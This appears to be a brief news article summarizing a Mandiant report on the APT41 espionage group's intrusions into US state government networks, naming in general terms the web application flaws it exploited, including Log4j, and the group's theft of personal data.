Mandiant, the cybersecurity company, which is about to be acquired by Google, has released a report investigating APT41 activities between May 2021 and From 2022. APT41 is a Chinese state-sponsored espionage gang that the FBI is currently searching for. The cyber gang targets both the public and private sectors.
Exploited at least six times
As a result of investigations, Mandiant has found that the group has breached US government networks at least six times. APT41 has used ASP .NET vulnerabilities for online web applications for those exploitations. They achieved this by .NET deserialization, SQL injection, and directory traversal techniques.
The group has managed to exploit USAHerds by an unknown zero-day vulnerability and another unrelated agency. Mandiant states that the group is very quick at adapting publicly disclosed flaws to access networks. APT41 has begun exploiting the infamous Log4j vulnerability within the hours of the Apache Foundation’s advisory, for later to compromise at least two US state governments, insurance, and telecommunications industries.
Researchers of Mandiant state that the goals of the current campaign are unknown:
« The goals of this campaign are currently unknown, though Mandiant has observed evidence of APT41 exfiltrating Personal Identifiable Information (PII). Although the victimology and targeting of PII data are consistent with an espionage operation, Mandiant cannot make a definitive assessment at this time given APT41’s history of moonlighting for personal financial gain »